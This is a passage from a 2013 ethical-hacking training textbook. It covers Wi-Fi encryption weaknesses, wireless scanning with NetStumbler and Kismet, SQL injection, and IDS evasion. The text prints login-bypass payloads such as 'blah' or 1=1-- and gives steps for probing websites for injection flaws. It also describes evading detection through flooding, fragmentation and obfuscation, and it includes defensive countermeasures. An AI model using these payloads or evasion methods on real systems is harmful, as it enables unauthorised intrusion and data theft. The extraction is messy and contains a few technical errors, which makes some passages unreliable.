Statistics of Open Wireless and insecure networks in Pune.

77

Most wireless LANs (WLANs) are based on the IEEE 802.11 standards
and amendments, such as 802.11a, 802.11b, 802.11g, and 802.11n. The
802.11 standard included only rudimentary security features and was
fraught with vulnerabilities. The 802.11iamendment is the latest security
solution that addresses the 802.11 weaknesses. The Wi-Fi Alliance
created additional security certifications known as Wi-Fi Protected Access
(WPA) and WPA2 to fill the gap between the original 802.11 standard and
the latest802.11i amendment. The security vulnerabilities and security
solutions discussed in this chapter are all based on these IEEE and Wi-
Fi Alliance standards.

77
http://www.wardrive.in/2008/11/wardriving-pune

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 177

 Ethical Hacking Part I

IEEE Wireless Standards

802.11 Release Data rate per Frequency Indoor Outdoor
Protocol stream(Mbit/s) Range Range
_____ June 1,2 2.4 GHz 20 110
1997 Meter Meter
Sep 54 Mbps 5 GHz/3.7 35 120
a 1999 GHz Meter Meter
Sep 11 Mbps 2.4 GHz 35 140
b 1999 Meter Meter
June 54 Mbps 2.4 GHz 70 250
g 2003 Meter Meter
Oct 72.2 Mbps 2.4/5 GHz 70 250
n 2009 Meter Meter

12.2 Overview of WEP, WPA Authentication Mechanisms,

and Cracking Techniques

Two methods exist for authenticating wireless LAN clients to an access

point: open system or shared key authentication. Open system does not
provide any security mechanisms but is simply request to make a
connection to the network. Shared key authentication has the wireless
client hash a string of challenge text with the WEP key to authenticate to
the network.

78Wired Equivalent Privacy (WEP) was the first security option for
802.11 WLANs. WEP is used to encrypt data on the WLAN and can
optionally be paired with shared key authentication to authenticate
WLAN clients. WEP uses an RC4 64-bit or 128-bit encryption key to
encrypt the layer 2 data payload. This WEP key comprises a 40-bit or
104-bit user-defined key combined with a 24-bit Initialization Vector (IV),
making the WEP key either 64- or 128-bit.

The process by which RC4 uses IVs is the real weakness of WEP: It
allows a hacker to crack the WEP key. The method, knows as the FMS

78
en.wikipedia.org/wiki/Wired_Equivalent_Privacy
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 178
 Ethical Hacking Part I

attack (Fluhrer, Mantin, and Shamir attack), uses encrypted output

bytes to determine the most probable key bytes. It was incorporated into
products like AirSnort, WEPCrack, and aircrack to exploit the WEP
vulnerability. Although a hacker can attempt to crack WEP by brute
force, the most common technique is the FMS attack.

WPA employs the Temporal Key Integrity Protocol (TKIP)—which is a

safer RC4 implementation—for data encryption and either WPA Personal
or WPA Enterprise for authentication.WPA Personal uses an ASCII
passphrase for authentication while WPA Enterprise uses RADIUS server
to authenticate users. WPA Enterprise is a more secure robust security
option but relies on the creation and more complex setup of a RADIUS
server. TKIP rotates the data encryption key to prevent the vulnerabilities
of WEP and, consequently, cracking attacks.WPA2 is similar to 802.11i
and uses the Advanced Encryption Standard (AES) to encrypt the data
payload. AES is considered an untraceable encryption algorithm. WPA2
also allows for the use of TKIP during a transitional period called mixed
mode security. This transitional mode means both TKIP and AES can be
used to encrypt data. AES requires a faster processor, which means low-
end devices like PDAs may only support TKIP. WPA Personal and
WPA2Personal use a passphrase to authentication WLAN clients. WPA
Enterprise and WPA2 Enterprise authenticate WLAN users via a RADIUS
server using the 802.1X/Extensible Authentication Protocol (EAP)
standards.

802.11i and WPA2 use the same encryption and authentication

mechanisms as WPA2.However, WPA2 doesn’t require vendors to
implement preauthorization. Preauthorization enables fast, secure
roaming, which is necessary in very mobile environments with time
sensitive applications such as wireless voice over IP.

Table 12.1 summarizes the authentication and encryption options for

WLANs.

TABLE 12.1 802.11 and WPA Security Solutions and Weaknesses

Encryption Authentication Weakness

Original IEEE WEP WEP IV weakness
802.11 allows the WEP
standard key to be
cracked. The
same key is used

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 179

 Ethical Hacking Part I

for encryption
and
authentication of
all clients to the
WLAN.
WPA TKIP Passphrase or Passphrase is
RADIUS susceptible to a
(802.1x/EAP) dictionary
attack.
WPA2 AES (can use Passphrase or Passphrase is
TKIP while in RADIUS susceptible to a
mixed mode) (802.1x/EAP) dictionary
attack.
IEEE 802.11i AES (can use Passphrase or Passphrase is
TKIP while in RADIUS susceptible
mixed mode) (802.1x/EAP) to a dictionary
attack.

79Overview of Wireless Sniffers and Locating SSIDs, MAC Spoofing

A common attack on a WLAN involves eavesdropping or sniffing. This is

an easy attack to perform and usually occurs at hotspots or with any
default installation access point (AP), because packets are generally sent
unencrypted across the WLAN. Passwords for network access protocols
such as FTP, POP3, and SMTP can be captured in clear text, meaning
unencrypted, by a hacker on an unencrypted WLAN.

The SSID is the name of the WLAN and can be located in a beacon. If two
wireless networks are physically close, the SSIDs are used to identify and
differentiate the respective networks. The SSID is usually sent in the
clear in a beacon packet. Most APs allow the WLAN administrator to hide
the SSID. However, this isn’t a robust security mechanism because some
tools can read the SSID from other packets such as probe and data
packets.

An early security solution in WLAN technology used MAC address filters:

A network administrator entered a list of valid MAC addresses for the
systems allowed to associate with the AP. MAC filters are cumbersome to
configure and aren’t scalable for an enterprise network because they
must be configured on each AP. MAC spoofing is easy to perform and
negates the effort required to implement MAC filters. A hacker can
79
http://my.safaribooksonline.com/book/certification/ceh/9780470525203/wireless-network-hacking
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 180
 Ethical Hacking Part I

identify a valid MAC address because the MAC headers are never
encrypted.

12.3. Wireless Hacking Techniques80

Most wireless hacking attacks can be categorized as follows:

 Cracking encryption and authentication mechanisms

These mechanisms include cracking WEP; WPA pre-shared key

authentication passphrase, and Cisco’s Lightweight EAP
authentication (LEAP). Hackers can use them to connect to the WLAN
using stolen credentials or can capture other users’ data and
decrypt/encrypt it.

 Eavesdropping or sniffing

This involves capturing passwords or other confidential information

from an unencrypted WLAN or hotspot.

 Denial of Service

DoS can be performed at the physical layer by creating a louder RF

signature than the AP with an RF transmitter, causing an approved
AP to fail so users connect to a rogue AP. DoS can be performed at the
Logical Link Control (LLC) layer by generating authentication frames
(death attacks) or by continuously generating bogus frames
(Queensland attack).

 AP masquerading or spoofing

Rogue APs pretend to be legitimate APs by using the same

configuration SSID settings or network name.

 MAC spoofing

The hacker pretends to be a legitimate WLAN client and bypasses

MAC filters by spoofing another user’s MAC address. Wireless
networks give a hacker an easy way into the network if the AP isn’t

80
http://my.safaribooksonline.com/book/certification/ceh/9780470525203/wireless-network-
hacking/wireless_hacking_techniques
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 181
 Ethical Hacking Part I

secured properly. There are many ways to hack or exploit the

vulnerabilities of a WLAN.

12.4. Methods Used to Secure Wireless Networks

Because wireless networking is a relatively new technology compared to

wired networking technologies, fewer security options are available.
Security methods can be categorized by the applicable layer of the OSI
model.


Layer 2 or MAC layer security options are as follows:


WPA


WPA2
802.11i


Layer 3 or Network layer security options are as follows:
IPSec or SSL VPN


Layer 7 or Application layer security options are as follows:
Secure applications such as Secure Shell (SSH), HTTP Over SSL


(HTTPS), and
FTP/SSL (FTPS)

12.5. Wireless Hacking tools

NetStumbler and Kismet are WLAN discovery tools. They both discover
the Media Access Control (MAC) address, Service Set Identifier (SSID),
security mode, and channel of the WLAN. Additionally, Kismet can
discover WLANs whose SSIDs are hidden, collect packets, and provide
IDS functionality.
NetStumbler is probably the first wireless discovery tool that people come
across. It is free, easy to install and simple to use. Netstumbler is a tool
for Windows that allows you to detect Wireless Local Area Networks
(WLANs) using 802.11b, 802.11a and 802.11g.
Netstumbler sends out a probe request about once a second, and reports
the responses. This is known as Active Scanning.

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 182

 Ethical Hacking Part I

i. Using Netstumbler:81
Once Netstumbler is installed all you need is a compatible wireless card
then simply double click on the Netstumbler icon and Netstumbler will
start probing for nearby wireless LANS:

One of the weaknesses of Netstumbler is its inability to detect Wireless

LANS utilizing hidden SSIDs.

However, Netstumbler does include a very useful graphical

representation of signal strength (indicated in green) and noise ratio
(indicated in red) over time, which is extremely useful for direction
finding Wireless LANS:

81
www.netstumbler.com/
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 183
 Ethical Hacking Part I

82

Netstumbler saves files in the .ns1 format. Providing a GPS device is

attached these files can then be then be imported (via Stumbverter) into
Microsoft's MapPoint software to produce a graphic representation of any
Wardriving or Site Surveys that may have been carried out:

82
wirelessdefence.org
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 184
 Ethical Hacking Part I

ii. Kismet

Kismet is a Linux-based wireless scanner. It’s a handy tool for surveying

the wireless airwaves around you to find target wireless LANs to crack.
Kismet also captures traffic, but there are other tools such as airodump
(part of Aircrack) that do a better job in the context of cracking WEP. So
we’ll be using it to make sure our wireless card is working and for
scanning for wireless networks.

You get to Kismet by clicking on the Programs icon, then Backtrack,

then Wireless, then Scanner/Analyzer, and finally Kismet

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 185

 Ethical Hacking Part I

In addition to scanning wireless networks, Kismet captures packets into

a file for later analysis. So Kismet will ask for the directory to save the
captured files in. Click Desktop and then OK

Specifying the Save Location

Kismet will then ask for a prefix for the captured files Change the default
name to capture and then click OK.

As Kismet starts, it will display all the wireless networks in range which
should hopefully include the target WLAN you set up. The channel
number, under the Ch column, should match what you have written
down. If Kismet has found many nearby access points, you may want to
move the lab farther away from the Access Points, or disconnect any
high-gain antennas you have connected.

83

While Kismet is jumping through all the channels and SSIDs looking for
interesting information, you will see the number of packets changing for

83
hackforums.net
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 186
 Ethical Hacking Part I

all the access points. In the column at the right side of the screen,
Kismet displays the total number of networks found, the number of
packets captured and the number of encrypted packets seen.

Even with the target computer off, Kismet is detecting packets from our
AP. This is because APs send out "beacons", which tell wireless
computers that an AP is in range. You can think of it as the AP
announcing, "My name is XXXXX, please connect to me."

Likewise there are many wireless hacking tools are available. For more
information refer wireless hacking tools on internet.

*********************

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 187

 Ethical Hacking Part I

ETHICAL HACKING
PART – II

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 188

 Ethical Hacking Part I

INDEX

Ethical Hacking Part II

Content
Chapter 13
SQL Injection
1. Introduction
2. Steps for conducting SQL Injection
3. SQL Server Vulnerability
4. Countermeasures

Chapter 14
Evading IDS, Firewall and Honeypot
1. Introduction to IDS, Firewall, Honeypot
2.Use of IDS, Firewall, Honeypot Evading tools
Chapter 15
Penetration Testing

1. Introduction
2. Conducting Penetration Testing
3. Penetration Testing Methodology
4. Penetration Testing Steps
5. Penetration Testing Tools
6. Penetration Testing Report
Chapter 16
Shell Scripting
1. Introduction to Shell
2. Types of Shell
3. Scripting Language
4. Shell Scripting
Chapter 17
Viruses And Worms
1. Introduction
2. Scripting Language and Viruses
3. Internet Worms
Chapter 18
Proxy Server

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 189

 Ethical Hacking Part I

6.1. Introduction
6.2. Use of Proxy Server For attack
6.3. IP Address Spoofing
6.4. MAC Address Spoofing
Chapter 19
Rootkit
7.1. Introduction
7.2. Types of Rootkits
7.3. Planting Rootkits on Windows
7.4. Detecting Rootkits
Chapter 20
Web Application Security
8.1. Introduction
8.2. Hacking Web Server
8.3. Web Server Hardening Methods
8.4. Web Application Vulnerabilities
Chapter 21
Buffer Overflow Attack
9.1. Introduction
9.2. Types of Buffer Overflow
9.3. Buffer Overflow & Web Application
9.4. Countermeasures
Chapter 22
Mobile Security
10.1. Mobile Vulnerabilities
10.2. Mobile phone Security Measures
10.3. Mobile Related Threat
10.4. Mobile Malwares
10.5. Mobile Based Attack
Chapter 23
Social Engineering
11.1. Introduction
11.2. Social Engineering Method
11.3. Common Attacks
11.4. Countermeasures
References

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 190

 Ethical Hacking Part I

CHAPTER 13
SQL Injection
Objective
13.1 Introduction
13.2 Threats of SQL Injection
13.3 SQL Injection Query
13.4 SQL Injection Vulnerabilities
13.5 Types of SQL Injection
13.6 Countermeasures

13.1 Introduction

Web applications allow legitimate website visitors to submit and retrieve

data to/from a database over the Internet using their preferred web
browser. Databases are central to modern websites – they store data
needed for websites to deliver specific content to visitors and render
information to customers, suppliers, employees and a host of
stakeholders. User credentials, financial and payment information,
company statistics may all be resident within a database and accessed
by legitimate users through off-the-shelf and custom web applications.
Web applications and databases allow you to regularly run your
business.

A SQL injection attack consists of insertion or "injection" of a SQL query

via the input data from the client to the application. A successful SQL
injection exploit can read sensitive data from the database, modify
database data (Insert/Update/Delete), execute administration operations
on the database (such as shutdown the DBMS), recover the content of a
given file present on the DBMS file system and in some cases issue
commands to the operating system. SQL injection attacks are a type of
injection attack, in which SQL commands are injected into data-plane
input in order to effect the execution of predefined SQL commands.84

84
www.owasp.org
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 191
 Ethical Hacking Part I

SQL injection is a code injection technique that exploits a security

vulnerability occurring in the database layer of an application. The
vulnerability is present when user input is either incorrectly filtered for
string literal escape characters embedded in SQL statements or user
input is not strongly typed and thereby unexpectedly executed.

85

SQL injection is an attack in which malicious code is inserted into

strings that are later passed to an instance of SQL Server for parsing and
execution. Any procedure that constructs SQL statements should be
reviewed for injection vulnerabilities because SQL Server will execute all
syntactically valid queries that it receives. Even parameterized data can
be manipulated by a skilled and determined attacker.

The primary form of SQL injection consists of direct insertion of code into
user-input variables that are concatenated with SQL commands and
executed. A less direct attack injects malicious code into strings that are
destined for storage in a table or as metadata. When the stored strings
are subsequently concatenated into a dynamic SQL command, the
malicious code is executed.

The injection process works by prematurely terminating a text string and

appending a new command. Because the inserted command may have
additional strings appended to it before it is executed, the malefactor

85
http://4.bp.blogspot.com/-fa9UxIPwaSg/T3DkFt-L7rI/AAAAAAAAAmg/U9968AW0b3k/s1600/SQL-
Injection-Attack.jpg
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 192
 Ethical Hacking Part I

terminates the injected string with a comment mark "--". Subsequent text
is ignored at execution time.86

During a SQL injection attack, malicious code is inserted into a web form
field or the website’s code to make a system execute a command shell or
other arbitrary commands. Just as a legitimate user enters queries and
additions to the SQL database via a web form, the hacker can insert
commands to the SQL server through the same web form field.

SQL Injection is one of the many web attack mechanisms used by

hackers to steal data from organizations. It is perhaps one of the most
common application layer attack techniques used today. It is the type
of attack that takes advantage of improper coding of your web
applications that allows hacker to inject SQL commands into say a login
form to allow them to gain access to the data held within your database.

For example, an arbitrary command from a hacker might open a

command prompt or display a table from the database. A database table
may contain personal information such as credit card numbers, social
security numbers, or passwords. SQL servers are very common database
servers and used by many organizations to store confidential data. This
makes a SQL server a high value target and therefore a system that is
very attractive to hackers.

13.2 Threats of SQL Injection

SQL injection attacks allow attackers to spoof identity, tamper with

existing data, cause repudiation issues such as voiding transactions or
changing balances, allow the complete disclosure of all data on the
system, destroy the data or make it otherwise unavailable, and become
administrators of the database server.
SQL Injection is very common with PHP and ASP applications due to the
prevalence of older functional interfaces. Due to the nature of
programmatic interfaces available, J2EE and ASP.NET applications are
less likely to have easily exploited SQL injections.87

86
http://msdn.microsoft.com/en-us/library/ms161953(v=sql.105).aspx
87
www.owasp.org/index.php/SQL_Injection
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 193
 Ethical Hacking Part I

Not preventing SQL Injection attacks leaves your business at great risk
of:

o Changes to or deletion of highly sensitive business information.

o Steal customer information such as social security numbers,
addresses, and credit card numbers.
o Financial losses
o Brand damage
o Theft of intellectual property
o Legal liability and fines88

13.3 SQL Injection Query

SQL Injection is the hacking technique which attempts to pass SQL

commands or statements through a web application for execution by the
backend database. If not sanitized properly, web applications may result
in SQL Injection attacks that allow hackers to view information from the
database and/or even wipe it out.
Such features as login pages, support and product request forms,
feedback forms, search pages, shopping carts and the general delivery of
dynamic content, shape modern websites and provide businesses with
the means necessary to communicate with prospects and customers.
These website features are all susceptible to SQL Injection attacks which
arise because the fields available for user input allow SQL statements to
pass through and query the database directly.
Before launching a SQL injection attack, the hacker determines whether
the configuration of the database and related tables and variables is
vulnerable. The steps to determine the SQL server’s vulnerability are as
follows:

1. Using your web browser, search for a website that uses a login
page or other database input or query fields (such as an “I forgot

88
http://www.applicure.com/solutions/prevent-sql-injection-attacks
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 194
 Ethical Hacking Part I

my password” form). Look for web pages that display the POST or
GET HTML commands by checking the site’s source code.

2. Test the SQL server using single quotes (‘‘). Doing so indicates
whether the user-input variable is sanitized or interpreted literally
by the server. If the server responds with an error message that
says use ‘a’=‘a’(or something similar), then it’s most likely
susceptible to a SQL injection attack.

3. Use the SELECT command to retrieve data from the database or

the INSERT command to add information to the database.

4. SELECT Count(*) FROM users WHERE UserName=’Blah’ 1=1 –

13.4 SQL Server Vulnerabilities

How does an attacker compromise your SQL server?

Before a web site can be compromised, an attacker needs to find

applications that are vulnerable to SQL injection using queries to learn
the SQL application methods and its response mechanisms.
The attacker has two ways to identify SQL injection vulnerabilities:

o Error messages: the attacker constructs the correct SQL syntax

based on errors messages propagated from the SQL server via
the front-end web application. Using the errors received, the
hacker learns the internal SQL database structure and how to
attack by injecting SQL queries via the Web application
parameters.

o Blindfolded Injection: this technique is utilized by hackers in

situations where no error messages or response content is
returned from the database. In these cases, the attacker lacks
the ability to learn the backend SQL queries in order to balance
the SQL injection query. In the lack of database content output
within the Web application, the attacker is also challenged with
finding a new way of retrieving the data.89

89
http://www.applicure.com/
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 195
 Ethical Hacking Part I

SQL Injection: A Simple Example

Take a simple login page where a legitimate user would enter his
username and password combination to enter a secure area to view his
personal details or upload his comments in a forum.
When the legitimate user submits his details, an SQL query is generated
from these details and submitted to the database for verification. If valid,
the user is allowed access. In other words, the web application that
controls the login page will communicate with the database through a
series of planned commands so as to verify the username and password
combination. On verification, the legitimate user is granted appropriate
access.
Through SQL Injection, the hacker may input specifically crafted SQL
commands with the intent of bypassing the login form barrier and seeing
what lies behind it. This is only possible if the inputs are not properly
sanitized and sent directly with the SQL query to the database. SQL
Injection vulnerabilities provide the means for a hacker to communicate
directly to the database.
The technologies vulnerable to this attack are dynamic script languages
including ASP, ASP.NET, PHP, JSP, and CGI. All an attacker needs to
perform an SQL Injection hacking attack is a web browser, knowledge of
SQL queries and creative guess work to important table and field names.
The sheer simplicity of SQL Injection has fuelled its popularity.
Here are some examples of variable field text you can use on a web form

 Blah’ or 1=1--
to test for SQL vulnerabilities:

 Login:blah’ or 1=1--

 Password::blah’ or 1=1--

These commands and similar variations may allow the bypassing of a

login depending on the structure of the database. When entered in a
form field the commands may return many rows in a table or even an
entire database table because the SQL server is interpreting the terms
literally. The double dashes near the end of the command tell SQL to
ignore the rest of the command as a comment.

The vulnerability is present when user input is either incorrectly filtered

for string literal escape characters embedded in SQL statements or user
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 196
 Ethical Hacking Part I

input is not strongly typed and thereby unexpectedly executed. Web

pages which accept parameters from user, and make SQL query to the
database are targeted

. 90

13.5 Types of SQL Injection

There are a number of categorized SQL injection types that can be

executed with a web-browser. They are:

 Poorly Filtered Strings

o SQL injections based on poorly filtered strings are caused by

user input that is not filtered for escape characters. This
means that a user can input a variable that can be passed
on as an SQL statement, resulting in database input
manipulation by the end user.

 Signature Evasion

o Many SQL injections will be somewhat blocked by intrusion

detection and intrusion prevention systems using signature
detection rules. Common programs that detect SQL

90
http://blog.itnet.vn/uploads/fckfinder/anhkha/images/bao-mat-website/sql-
injection/hack%20is%20power%20sql%20injection.JPG
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 197
 Ethical Hacking Part I

injections are mod_security for Apache and Snort. These

programs aren't fool proof and as such, the signatures can
be evaded.

 Blind SQL Injection

o Most good production environments do not allow you to see

output in the form of error messages or extracted database
fields whilst conducting SQL injections, these injections are
known as Blind SQL Injections. They are titled Partially
Blind Injections and Totally Blind Injections.
o Partially Blind Injections are injections where you can see
slight changes in the resulting page, for instance, an
unsuccessful injection may redirect the attacker to the main
page, where a successful injection will return a blank page.
o Totally Blind Injections are unlike Partially Blind Injections
in that they don't produce difference in output of any kind.
This is still however injectable, though it's harder to
determine whether an injection is actually taking place

13.6 SQL Injection Countermeasures

91

91
http://dilanwarnakulasooriya.files.wordpress.com/2012/01/sql_inject.png
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 198
 Ethical Hacking Part I

SQL Injection flaws are introduced when software developers create

dynamic database queries that include user supplied input. To avoid
SQL injection flaws is simple. Developers need to either:

a) Stop writing dynamic queries; and/or

b) Prevent user supplied input which contains malicious SQL from
affecting the logic of the executed query.
Primary Defenses:

1: Use of Prepared Statements (Parameterized Queries)

Prepared statements ensure that an attacker is not able to change

the intent of a query, even if SQL commands are inserted by an
attacker. In the safe example below, if an attacker were to enter the
userID of tom' or '1'='1, the parameterized query would not be
vulnerable and would instead look for a username which literally
matched the entire string tom' or '1'='1.

2: Use of Stored Procedures

The difference between prepared statements and stored procedures

is that the SQL code for a stored procedure is defined and stored in
the database itself, and then called from the application. Both of
these techniques have the same effectiveness in preventing SQL
injection.

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 199

 Ethical Hacking Part I

Additional Defenses:

Least Privilege

To minimize the potential damage of a successful SQL injection

attack, minimize the privileges assigned to every database account
in your environment. Do not assign DBA or admin type access
rights to your application accounts. Make sure that accounts that
only need read access are only granted read access to the tables
they need access to. If an account only needs access to portions of
a table, consider creating a view that limits access to that portion
of the data and assigning the account access to the view instead,
rather than the underlying table. Rarely, if ever, grants create or
delete access to database accounts.

SQL injection is not the only threat to your database data.

Attackers can simply change the parameter values from one of the
legal values they are presented with, to a value that is
unauthorized for them, but the application itself might be
authorized to access. As such, minimizing the privileges granted to
your application will reduce the likelihood of such unauthorized
access attempts, even when an attacker is not trying to use SQL
injection as part of their exploit.92

92
http://www.owasp.org/index.php/SQL_Injection_Prevention
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 200
 Ethical Hacking Part I

CHAPTER 14

Evading IDS, Firewalls and Detecting Honeypots

Objective
14.1 Intrusion Detection Systems (IDS)
14.2 Types of IDS
14.3 Firewall
14.4 Types of Firewall
14.5 Firewall Identification techniques
14.6 Honeypot
14.7 How to set up a Honeypot?

14.1 Intrusion Detection Systems (IDS)

93

93
http://ids.nic.in/intrusiondetectionsystem.JPG
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 201
 Ethical Hacking Part I

An intrusion detection system (IDS) inspects all inbound and outbound

network activity and identifies suspicious patterns that may indicate a
network or system attack from someone attempting to break into or
compromise a system.

An IDS is also referred as “packet-sniffer”, which intercepts packets

travelling along various communication mediums and protocols, usually
TCP/IP.

14.2 Types of IDS

IDS come in a variety of “flavors” and approach the goal of

detecting suspicious traffic in different ways. There are network
based (NIDS) and host based (HIDS) intrusion detection systems.
There are IDS that detect based on looking for specific signatures
of known threats- similar to the way antivirus software typically
detects and protects against malware- and there are IDS that
detect based on comparing traffic patterns against a baseline and
looking for anomalies.

There are two main types of systems in which IDS can be used:
Network, Host and Log file Monitoring.

NIDS

Network Intrusion Detection Systems are placed at a strategic

point or points within the network to monitor traffic to and from all
devices on the network. Ideally you would scan all inbound and
outbound traffic; however doing so might create a bottleneck that
would impair the overall speed of the network.
In a network-based intrusion-detection system (NIDS), the sensors
are located at choke points in network to be monitored, often in the
demilitarized zone (DMZ) or at network borders. The sensor
captures all network traffic and analyzes the content of individual
packets for malicious traffic.

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 202

 Ethical Hacking Part I

HIDS

Host Intrusion Detection Systems are run on individual hosts or

devices on the network. A HIDS monitors the inbound and
outbound packets from the device only and will alert the user or
administrator of suspicious activity is detected.94

How IDS Works?

To understand how IDS works, we need to know the three main

components which built up the IDS. The three main components
are sensor, backend and frontend. These three components will be
explained in term of the functions as followed:

(1) Sensor
Sensor works as a packet capture and activity capture engine. It
determines the presence of an event by comparing the events
captured with the events in the signature database. This technique
is known as pattern matching. The IDS looks for traffics and
behavior that match the pattern of known attacks in the signature
database. Thus, the database must be kept up-to-date. The sensor
is only focus on detection. In the case for network-based IDS, the
sensor will tap into the network and listen to the various
communications within its reach. When the sensor found event
which matched the event in the signature database, it will report
the detection to the backend.

(2) Backend
The backend plays its role as an alarm. It is the core of the IDS
where it determines how an event reported by the sensor is
handled. The backend will collect all events detected by the
sensors and keep the events record in an event repository
database. It will then alert the users if there are any threaten
events found. The ways to respond by IDS can be configured by the
IDS’s users. Usually, alert can come in the form of log, email or

94
http://netsecurity.about.com/cs/hackertools
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 203
 Ethical Hacking Part I

screen display. Backend also provide IDS setup and configuration

storage.

(3) Frontend
Since backend plays it role to collect events captured by the
sensor, frontend will display/view the events collected. It is a direct
user interface which allow user to command and control the IDS.
From the frontend, the user can view the events detected by
sensor, setup and configure IDS and update the signature
database.95

Ways to Detect an Intrusion

All Intrusion Detection Systems uses following detection techniques:

 Statistical anomaly based IDS- A statistical anomaly-based IDS

establishes a performance baseline based on normal network
traffic evaluations. It will then sample current network traffic
activity to this baseline in order to detect whether or not it is
within baseline parameters. If the sampled traffic is outside
baseline parameters, an alarm will be triggered.

 Signature-Recognition- Network traffic is examined for

preconfigured and predetermined attack patterns known as
signatures. Many attacks today have distinct signatures. In good
security practice, a collection of these signatures must be
constantly updated to mitigate emerging threats.

 Protocol Anomaly Detection- In this type of Detection, models

are built on TCP/IP protocols using their specification.

95
http://yewchuan.wordpress.com
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 204
 Ethical Hacking Part I

An IDS works by examining the following events:

Observing Activity: The intrusion detection system will observe activity

taking place within the network and keep track of user policies and
activity patterns to ensure there are no attempts to violate these
patterns.

Viruses: Virus and malware can hide within a network system in the
form of spyware, keylogging, password theft, and other types of malicious
attacks. A good intrusion detection system can spot where they are
hiding and then take the necessary steps to remove these hidden files.

Vulnerabilities: When a network system is configured it can create

vulnerabilities in system configuration files. In this case the intrusion
detection system will identify the vulnerabilities in the configuration files
as well as each machine on the network.

File Settings: Authorization files on a network generally consist of a user

authorization and a group authorization. The intrusion detection system
will check these on a regular basis to ensure they have not been
tampered with in any way.

Services: Service configuration files are routinely checked to ensure that

the there are no unauthorized services in operation on the network.

Packet Sniffing: Intrusion detection systems check for unauthorized

network monitoring programs that may have been installed for the
purpose of monitoring and recording user account data activity.

PC Check: The intrusion detection system will check each PC on the

network periodically to make sure there have not been any violations or
tampering activity. Generally if one PC displays a violation, the system
should check all of the other machines on the network.96

96
http://www.spamlaws.com
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 205
 Ethical Hacking Part I

14.3 IDS Evasion Techniques

Intrusion detection system evasion techniques bypass detection by

creating different states on the IDS and on the targeted computer. The
adversary accomplishes this by manipulating either the attack itself or
the network traffic that contains the attack.
These evasive techniques include flooding, fragmentation, encryption,
and obfuscation.

Flooding- IDSs depend on resources such as memory and processor

power to effectively capture packets, analyze traffic, and report malicious
attacks. By flooding a network with noise traffic, an attacker can cause
the IDS to exhaust its resources examining harmless traffic. In the
meantime, while the IDS is distracted and occupied by the volume of
noise traffic, the attacker can target its system with little or no
intervention from the IDS.

A denial of service (DOS) attack is one that is intended to compromise

the availability of a computing resource. Common DOS attacks include
ping floods and mail bombs --- both intended to consume
disproportionate amounts of resources, starving legitimate processes.
Other attacks are targeted at bugs in software, and are intended to crash
the system. The infamous ``ping of death'' and ``teardrop'' attacks are
examples of these.
Denial of service attacks can be leveraged to subvert systems (thus
compromising more than availability) as well as to disable them. When
discussing the relevance of DOS attacks to a security system, the
question of whether the system is ``fail-open'' arises. A ``fail-open''
system ceases to provide protection when it is disabled by a DOS attack.
A ``fail-closed'' system, on the other hand, leaves the network protected
when it is forcibly disabled.

The terms ``fail-open'' and ``fail-closed'' are most often heard within the
context of firewalls, which are access-control devices for networks. A fail-
open firewall stops controlling access to the network when it crashes, but
leaves the network available. An attacker that can crash a fail-open
firewall can bypass it entirely. Good firewalls are designed to ``fail-
closed'', leaving the network completely inaccessible (and thus protected)
if they crash.

Network ID systems are passive. They do not control the network or

maintain its connectivity in any way. As such, a network IDS is
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 206
 Ethical Hacking Part I

inherently fail-open. If an attacker can crash the IDS or starve it of

resources, she can attack the rest of the network as if the IDS weren’t
even there. Because of the obvious susceptibility to DOS attacks that
network ID systems have, it's important that they be fortified against
them.

Unfortunately, denial of service attacks is extremely difficult to defend

against. The resource starvation problem is not easily solvable, and there
are many different points at which the resources of IDS can be
consumed. Attacks that crash the IDS itself are easily fixed, but finding
all such vulnerabilities is not easily done.

Fragmentation-Because different network media allow variable

maximum transmission units (MTUs), you must allow for the
fragmentation of these transmission units into differently sized packets
or cells. Hackers can take advantage of this fragmentation by dividing
attacking packets into smaller and smaller portions that evade the IDS
but cause an attack when reassembled by a target host.

Protocols like TCP allow any amount of data (within the limits of the IP
protocol's maximum packet size) to be contained in each discrete packet.
A collection of data can be transmitted in one packet, or in a group of
them. Because they can arrive at their destination out of order, even
when transmitted in order, each packet is given a number that indicates
its place within the intended order of the stream. This is commonly
referred to as a `sequence number'', and we call collections of packets
marked with sequence numbers ``sequenced''.97

Encryption-Network-based intrusion detection (covered later in this

chapter) relies on the analysis of traffic that is captured as it traverses
the network from a source to its destination. If a hacker can establish an
encrypted session with its target host using Secure Shell (SSH), Secure
Socket Layer (SSL), or a virtual private network (VPN) tunnel, the IDS
cannot analyze the packets and the malicious traffic will be allowed to
pass. Obviously, this technique requires that the attacker establish a
secure encrypted session with its target host.

Obfuscation-Obfuscation, an increasingly popular evasive technique,

involves concealing an attack with special characters. It can use control
characters such as the space, tab, backspace, and Delete. Also, the
technique might represent characters in hex format to elude the IDS.

97
http://insecure.org/stf/secnet_ids/secnet_ids.html
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 207
 Ethical Hacking Part I

Using Unicode representation, where each character has a unique value

